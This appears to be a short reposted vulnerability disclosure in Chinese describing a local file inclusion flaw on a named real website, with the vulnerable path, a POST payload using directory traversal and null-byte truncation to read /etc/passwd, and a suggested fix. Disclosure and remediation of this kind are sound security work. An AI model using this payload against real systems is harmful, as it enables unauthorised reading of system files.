存在文件包含的站点: http://diy.91.com 对http://diy.91.com/login.php 测试,无果。 通过目录遍历得到: diy.91.com/tools/log/ post:logtype=../../../../../../../../../../etc/passwd%00.jpg
修复方案: logtype参数进行限制,猜测应该是 include $_POST[logtype].".php" ..php被%00截断了。。你们的php版本较低。。可以的话做下升级吧。 |
-
上一篇: 51信用卡管家任意用户密码修改 - 网站安全 - 自学
下一篇: MySQL暴错注入方法整理 - 网站安全 - 自学php
还没有人抢沙发呢~